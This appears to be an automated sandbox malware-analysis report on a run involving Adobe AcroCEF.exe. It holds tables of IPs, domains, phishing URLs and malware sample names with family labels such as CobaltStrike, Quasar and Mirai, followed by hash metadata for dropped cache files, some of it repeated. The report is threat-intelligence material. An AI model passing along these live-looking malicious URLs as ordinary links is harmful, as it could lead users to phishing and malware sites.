                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, r1---sn-t0aekn7e.gvt1.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, imagizer.imageshack.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, armmf.adobe.com, a1570.dscb.akamai.net, r1.sn-t0aekn7e.gvt1.com, clients.l.google.com, geo2.adobe.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  TimeTypeDescription
                                                  06:06:35API Interceptor3x Sleep call for process: AcroCEF.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  67.212.184.148https://ky.codzika.xyz/pubg/Get hashmaliciousUnknownBrowse
                                                    37.48.68.71https://hdtodayz.to/movie/watch-the-shawshank-redemption-hd-19679Get hashmaliciousHTMLPhisherBrowse
                                                      https://hianime.toGet hashmaliciousUnknownBrowse
                                                        https://squad.cl:443/MTU0czVIMDg3ODR6OG4=Get hashmaliciousUnknownBrowse
                                                          ZXQ3AcEN5Q.exeGet hashmaliciousUnknownBrowse
                                                            https://t.co/GwSCNEI0VcGet hashmaliciousUnknownBrowse
                                                              http://cdqv.lambevip.site/4vywRe2910cNYr364eiqjrxibvf14478CJLTWCQKBRVUFHM234008XTXI8858k18Get hashmaliciousPhisherBrowse
                                                                http://v9.www-ytmp4.comGet hashmaliciousUnknownBrowse
                                                                  http://blix.sxGet hashmaliciousUnknownBrowse
                                                                    https://gofile.cc/dNjy/sedatameridian-cooperative.zipGet hashmaliciousUnknownBrowse
                                                                      http://videograbber.ccGet hashmaliciousUnknownBrowse
                                                                        104.18.3.4http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                                          https://www.menti.com/8jzk2vh115Get hashmaliciousHTMLPhisherBrowse
                                                                            https://www.menti.com/yeszdv9q5zGet hashmaliciousHTMLPhisherBrowse
                                                                              https://www.menti.com/w1iavk99icGet hashmaliciousUnknownBrowse
                                                                                151.101.130.217https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                  http://vzgb5l.elnk8.com/83885021a686e36f9150aaf51cbc0afdhGet hashmaliciousUnknownBrowse
                                                                                    http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                                                      https://public-usa.mkt.dynamics.com/api/orgs/010a432a-e2a3-ef11-8a66-6045bd016f25/r/movKLLTpWUCqpRQQ2_8SfQEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fapp.seesaw.me%252Fpages%252Fshared_item%253Fitem_id%253Ditem.96abdfb3-93cb-482c-822f-f1d275a42e6e%2526share_token%253DDfLCj_YZQZedsrWVvLwerg%2526mode%253Dshare%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=kBeCY6h3I2oKWHussXexCqSpSk%2BEhyyLm0j2TqAuyLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                                                        IMG_1205 #U2014 ThingLink.htmlGet hashmaliciousUnknownBrowse
                                                                                          https://www.wixsite.com/_api/invoice/2d5e7023-6014-4f5e-ab31-c1e25d999b96:9b27124a-a130-45dc-b81f-e5675b538826/view?token=56c18155-b636-4505-b95c-630f3d19901aGet hashmaliciousHTMLPhisherBrowse
                                                                                            https://cipdegiphar-pharm.click/BD0C84/D0C-N0V20.htmlGet hashmaliciousUnknownBrowse
                                                                                              https://hopp.bio/wchnGet hashmaliciousHTMLPhisherBrowse
                                                                                                https://axieu.com/terma/GeHDLfGet hashmaliciousUnknownBrowse
                                                                                                  https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36Get hashmaliciousUnknownBrowse
                                                                                                    104.18.2.4https://www.menti.com/8jzk2vh115Get hashmaliciousHTMLPhisherBrowse
                                                                                                      https://www.menti.com/yeszdv9q5zGet hashmaliciousHTMLPhisherBrowse
                                                                                                        https://www.menti.com/w1iavk99icGet hashmaliciousUnknownBrowse
                                                                                                          51.68.82.147http://www.tropbikewall.art/?sl=5706540-e4d07&data1=Track1&data2=Track2&tag=M7306521088920387799&website=21505-85fb5adz&placement=21505Get hashmaliciousUnknownBrowse
                                                                                                          • www.tropbikewall.art/?sl=5706540-e4d07&data1=Track1&data2=Track2&tag=M7306521088920387799&website=21505-85fb5adz&placement=21505
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          my.rtmark.nethttps://hdtodayz.to/movie/watch-the-shawshank-redemption-hd-19679Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.21.27.183
                                                                                                          http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.169.157
                                                                                                          https://hianime.toGet hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.8
                                                                                                          https://www.mycimalive.com/Get hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.8
                                                                                                          https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845Get hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.8
                                                                                                          http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 139.45.195.8
                                                                                                          https://getwinprizir.xyz/Win/Madagascar12/?devicemodel=&browser=Unknown%20Crawler&ip=35.243.23.135&bemobdata=c=5c562b08-1822-4c6c-92d2-a9e468b632ee..l=ca880745-aa6d-421a-8844-fb2d086ba6b2..a=0..b=0..r=http://r96d8~BEMOB_DOT~bemobtrcks~BEMOB_DOT~com..ts=1727431704884Get hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.8
                                                                                                          http://nondsproiz.xyz/Win/Cameroun12Get hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.8
                                                                                                          https://nondsproiz.xyz/Win/Guinea12/Get hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.8
                                                                                                          https://nondsproiz.xyz/Win/Madagascar12/?devicemodel=&browser=Firefox%20for%20Mobile&ip=35.243.23.135&bemobdata=c=5c562b08-1822-4c6c-92d2-a9e468b632ee..l=ca880745-aa6d-421a-8844-fb2d086ba6b2..a=0..b=0..r=http://r96d8~BEMOB_DOT~bemobtrcks~BEMOB_DOT~com..ts=1727158341919Get hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.8
                                                                                                          bg.microsoft.map.fastly.netCKi4EZWZsC.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                                                          • 199.232.214.172
                                                                                                          LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.210.172
                                                                                                          4HbZBsYZ48.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.210.172
                                                                                                          DUD6CqQ1Uj.docGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.210.172
                                                                                                          ny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 199.232.214.172
                                                                                                          JP1KbvjWcM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                          • 199.232.210.172
                                                                                                          cZO.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.214.172
                                                                                                          jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 199.232.210.172
                                                                                                          3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.210.172
                                                                                                          N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                          • 199.232.214.172
                                                                                                          browser.sentry-cdn.comhttps://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.194.217
                                                                                                          http://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.194.217
                                                                                                          http://vzgb5l.elnk8.com/83885021a686e36f9150aaf51cbc0afdhGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.2.217
                                                                                                          http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.130.217
                                                                                                          https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 151.101.194.217
                                                                                                          IMG_1205 #U2014 ThingLink.htmlGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.2.217
                                                                                                          https://cipdegiphar-pharm.click/BD0C84/D0C-N0V20.htmlGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.66.217
                                                                                                          https://whimsical.com/project-960-2024-doc-KUa9Z37ZsDmpPxB99pof8AGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.2.217
                                                                                                          http://deepai.orgGet hashmaliciousLiteHTTP BotBrowse
                                                                                                          • 151.101.2.217
                                                                                                          https://form.jotform.com/243104959551055Get hashmaliciousUnknownBrowse
                                                                                                          • 151.101.130.217
                                                                                                          datatechonert.comhttps://hdtodayz.to/movie/watch-the-shawshank-redemption-hd-19679Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 37.48.68.71
                                                                                                          http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                                                                          • 185.49.145.45
                                                                                                          https://hianime.toGet hashmaliciousUnknownBrowse
                                                                                                          • 185.49.145.45
                                                                                                          https://squad.cl:443/MTU0czVIMDg3ODR6OG4=Get hashmaliciousUnknownBrowse
                                                                                                          • 185.49.145.45
                                                                                                          http://blix.sxGet hashmaliciousUnknownBrowse
                                                                                                          • 37.48.68.71
                                                                                                          https://gofile.cc/dNjy/sedatameridian-cooperative.zipGet hashmaliciousUnknownBrowse
                                                                                                          • 37.48.68.71
                                                                                                          http://videograbber.ccGet hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.253
                                                                                                          https://signalspotharshly.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 37.48.68.71
                                                                                                          https://trendyswipe.com/technology/iphone-android-phone-users-use-this-application-with-caution-vicious-roaming-mantis-phishing-scam-hits-10000-people/Get hashmaliciousUnknownBrowse
                                                                                                          • 139.45.195.253
                                                                                                          https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%253A%252F%252Fwww.ugurtarim.com.tr%252Fwp-content%252Fuploads%252F2022%252F01%26sa%3DD%26sntz%3D1%26usg%3DAOvVaw3_MvY56gD68sWE_sGQd9XKGet hashmaliciousUnknownBrowse
                                                                                                          • 37.48.68.71
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          FASTLYUShttps://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                          • 151.101.64.176
                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                          • 151.101.130.152
                                                                                                          https://www.calameo.com/read/005652686f8ff374103f3Get hashmaliciousUnknownBrowse
                                                                                                          • 151.101.1.194
                                                                                                          mr2v5o2eB3.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 185.199.108.153
                                                                                                          mr2v5o2eB3.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 185.199.110.153
                                                                                                          PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                                                                                          • 199.232.196.209
                                                                                                          31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 151.101.12.190
                                                                                                          3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                          • 185.199.111.133
                                                                                                          https://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832Get hashmaliciousKnowBe4Browse
                                                                                                          • 199.232.196.193
                                                                                                          https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 151.101.130.137
                                                                                                          CLOUDFLARENETUShttps://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
                                                                                                          • 104.16.117.116
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.26.149
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.26.149
                                                                                                          https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                          • 104.17.25.14
                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.66.57
                                                                                                          yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 188.114.97.3
                                                                                                          CLOUDFLARENETUShttps://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
                                                                                                          • 104.16.117.116
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.26.149
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.26.149
                                                                                                          https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                          • 104.17.25.14
                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.66.57
                                                                                                          yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 188.114.97.3
                                                                                                          UNIFIEDLAYER-AS-1USarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 50.87.220.8
                                                                                                          4.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 173.83.210.158
                                                                                                          fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 98.130.46.22
                                                                                                          Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 162.215.116.7
                                                                                                          https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 162.241.149.91
                                                                                                          http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                          • 192.185.79.204
                                                                                                          hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                          • 192.185.146.136
                                                                                                          Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                          • 108.179.193.23
                                                                                                          botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 173.254.41.71
                                                                                                          botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 50.87.246.4
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):289
                                                                                                          Entropy (8bit):5.167390322194713
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:iOsxEt+q2Pwkn2nKuAl9OmbnIFUtSxKHZmwAxKnVkwOwkn2nKuAl9OmbjLJ:7oEovYfHAahFUtqy/s+5JfHAaSJ
                                                                                                          MD5:80BF747B0FD35C54CD6F1CAAF8ECBC7B
                                                                                                          SHA1:A00FE69D0D73DBF132068A290CA0A6264E314E9D
                                                                                                          SHA-256:44AA1AAA5DA0657EF2C2CE5F81A46B319F1054C5741AA432A99CE6F13EA15986
                                                                                                          SHA-512:33476567259B1BF12FE93FEEE79269118A164458F1449A2AA8906A58E6DCC685F213F2A82F3F595AAB4D9E0BD91853F10BC6972AA5A61299C11780B763795079
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:2025/01/06-06:06:22.703 908 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/06-06:06:22.705 908 Recovering log #3.2025/01/06-06:06:22.705 908 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):289
                                                                                                          Entropy (8bit):5.167390322194713
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:iOsxEt+q2Pwkn2nKuAl9OmbnIFUtSxKHZmwAxKnVkwOwkn2nKuAl9OmbjLJ:7oEovYfHAahFUtqy/s+5JfHAaSJ
                                                                                                          MD5:80BF747B0FD35C54CD6F1CAAF8ECBC7B
                                                                                                          SHA1:A00FE69D0D73DBF132068A290CA0A6264E314E9D
                                                                                                          SHA-256:44AA1AAA5DA0657EF2C2CE5F81A46B319F1054C5741AA432A99CE6F13EA15986
                                                                                                          SHA-512:33476567259B1BF12FE93FEEE79269118A164458F1449A2AA8906A58E6DCC685F213F2A82F3F595AAB4D9E0BD91853F10BC6972AA5A61299C11780B763795079
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:2025/01/06-06:06:22.703 908 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/06-06:06:22.705 908 Recovering log #3.2025/01/06-06:06:22.705 908 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):336
                                                                                                          Entropy (8bit):5.166862600019666
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:iOsxm4q2Pwkn2nKuAl9Ombzo2jMGIFUtSxTFFJZmwAxm3DkwOwkn2nKuAl9Ombzz:7oFvYfHAa8uFUtqTF//su5JfHAa8RJ
                                                                                                          MD5:706B5EF8F83EA233B1B0C7B23C74A285
                                                                                                          SHA1:28CBE280A4BC9A47EE63EF60130E425941C1C4E9
                                                                                                          SHA-256:BABCBB0AC50E40FE3A469BEAD9637D6835975AE2EC6C327CBFF2316AB289C06C
                                                                                                          SHA-512:7B7A3B9EF6C5FC4A345BE580F9737B1EA52260C5ACC9B22E3D2867CCEAFC84F3263D17DA8567B38E37720F9B90B5CB9E1683B8E35F43E2E6F96E95A62C761B97
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:2025/01/06-06:06:22.773 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/06-06:06:22.774 1c80 Recovering log #3.2025/01/06-06:06:22.775 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):336
                                                                                                          Entropy (8bit):5.166862600019666
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:iOsxm4q2Pwkn2nKuAl9Ombzo2jMGIFUtSxTFFJZmwAxm3DkwOwkn2nKuAl9Ombzz:7oFvYfHAa8uFUtqTF//su5JfHAa8RJ
                                                                                                          MD5:706B5EF8F83EA233B1B0C7B23C74A285
                                                                                                          SHA1:28CBE280A4BC9A47EE63EF60130E425941C1C4E9
                                                                                                          SHA-256:BABCBB0AC50E40FE3A469BEAD9637D6835975AE2EC6C327CBFF2316AB289C06C
                                                                                                          SHA-512:7B7A3B9EF6C5FC4A345BE580F9737B1EA52260C5ACC9B22E3D2867CCEAFC84F3263D17DA8567B38E37720F9B90B5CB9E1683B8E35F43E2E6F96E95A62C761B97
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:2025/01/06-06:06:22.773 1c80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/06-06:06:22.774 1c80 Recovering log #3.2025/01/06-06:06:22.775 1c80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:modified
                                                                                                          Size (bytes):475
                                                                                                          Entropy (8bit):4.9655162853550765
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:YH/um3RA8sqSsBdOg2H46fcaq3QYiubInP7E4T3y:Y2sRds2dMHo3QYhbG7nby
                                                                                                          MD5:71C942A7FBBE244DD266D93DE1060B86
                                                                                                          SHA1:5E0B050C7F32C1158D5087100CE2A1D5B7AB0229
                                                                                                          SHA-256:199C946C7F01165C991009D24AEBB76FC5D4372D48AC3651F58BC662955E6998
                                                                                                          SHA-512:C60F715FB65CF49A33ED0424F619361B16695C7F30FD59EF2588B3624515F17F8D899926202D231ED4CED0D6C092361562157926BAC6F57128D46832F41E974F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380721595322250","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":135305},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):475
                                                                                                          Entropy (8bit):4.9655162853550765
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:YH/um3RA8sqSsBdOg2H46fcaq3QYiubInP7E4T3y:Y2sRds2dMHo3QYhbG7nby
                                                                                                          MD5:71C942A7FBBE244DD266D93DE1060B86
                                                                                                          SHA1:5E0B050C7F32C1158D5087100CE2A1D5B7AB0229
                                                                                                          SHA-256:199C946C7F01165C991009D24AEBB76FC5D4372D48AC3651F58BC662955E6998
                                                                                                          SHA-512:C60F715FB65CF49A33ED0424F619361B16695C7F30FD59EF2588B3624515F17F8D899926202D231ED4CED0D6C092361562157926BAC6F57128D46832F41E974F
                                                                                                          Malicious:false
                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380721595322250","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":135305},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4730
                                                                                                          Entropy (8bit):5.256623887517744
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7R4MWPR4uWPZ:etJCV4FiN/jTN/2r8Mta02fEhgO73go3
                                                                                                          MD5:560AA81BDED0D080ACBB29B1321AC03F
                                                                                                          SHA1:083CD11EE9E5A58E0BCFB04FB3CFC155D890AE51
                                                                                                          SHA-256:D8F3282A6795E2A0FAFF5B862D77912A743625F5C94EAA888F52FF40B6D5E43C
                                                                                                          SHA-512:371E0DDCE8B587FFCC5727F4CDD664FA8C92B6C6A6107442CE32B853D28F6145751010E72C56A9F8C3B1065B8E80E7B67A826265C527F4BFBA0B0DDC7609BEEC
                                                                                                          Malicious:false
